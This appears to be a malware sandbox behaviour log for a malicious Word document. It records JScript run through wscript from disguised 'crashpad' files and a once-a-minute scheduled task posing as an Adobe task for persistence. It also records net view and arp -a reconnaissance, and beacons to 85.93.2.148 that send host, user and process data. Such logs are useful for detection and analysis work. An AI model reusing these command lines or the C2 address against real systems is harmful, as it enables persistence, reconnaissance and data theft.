Source: WINWORD.EXE | String found in binary or memory: file:/// |
Source: WINWORD.EXE | String found in binary or memory: file:///%f |
Source: WINWORD.EXE | String found in binary or memory: file:///C: |
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc |
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc)) |
Source: wscript.exe | String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q |
Source: wscript.exe | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.use |
Source: wscript.exe | String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0) |
Source: wscript.exe | String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$ |
Source: wscript.exe | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0 |
Source: WINWORD.EXE | String found in binary or memory: http://ns.ad |
Source: WINWORD.EXE | String found in binary or memory: http://ns.adbe. |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0% |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0- |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com05 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net03 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net0D |
Source: WINWORD.EXE | String found in binary or memory: http://p |
Source: wscript.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: wscript.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: WINWORD.EXE | String found in binary or memory: http://www.msnusers.com |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0 |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0 |
Source: wscript.exe | String found in binary or memory: http://www.usertrust.com1 |
Source: wscript.exe | String found in binary or memory: https:// |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_information |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationBK |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationY |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationx |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_process_list |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_process_listX |
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=waitl |
Source: wscript.exe | String found in binary or memory: https://97 |
Source: wscript.exe | String found in binary or memory: https://secure.comodo.com/CPS0 |
Source: 192.168.1.16:49163 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893& |
Source: 192.168.1.16:49164 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893& |
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf |
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn |
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo |
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf |
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn |
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo |
Source: 192.168.1.16:49170 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893& |
Source: 192.168.1.16:49171 -> 85.93.2.148:443 | HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2a 30 7c 53 79 73 74 65 6d 2a 34 7c 73 6d 73 73 2e 65 78 65 2a 32 30 30 7c 63 73 72 73 73 2e 65 78 65 2a 32 37 36 7c 77 69 6e 69 6e 69 74 2e 65 78 65 2a 33 31 32 7c 63 73 72 73 73 2e 65 78 65 2a 33 32 30 7c 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2a 33 34 38 7c 73 65 72 76 69 63 65 73 2e 65 78 65 2a 34 30 34 7c 6c 73 61 73 73 2e 65 78 65 2a 34 32 30 7c 6c 73 6d 2e 65 78 65 2a 34 32 38 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 35 33 36 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 36 30 30 7c 73 76 63 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=System Idle Process*0|System*4|smss.exe*200|csrss.exe*276|wininit.exe*312|csrss.exe*320|winlogon.exe*34 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\adjusted_records.doc |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1 |
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {6C8EBD0A-6843-4E76-AA78-1A12EAE50432} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1] |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: unknown | Process created: C:\Windows\System32\net.exe net view |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml' |
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml' |
Source: unknown | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1 |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml' |
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml' |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml' |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
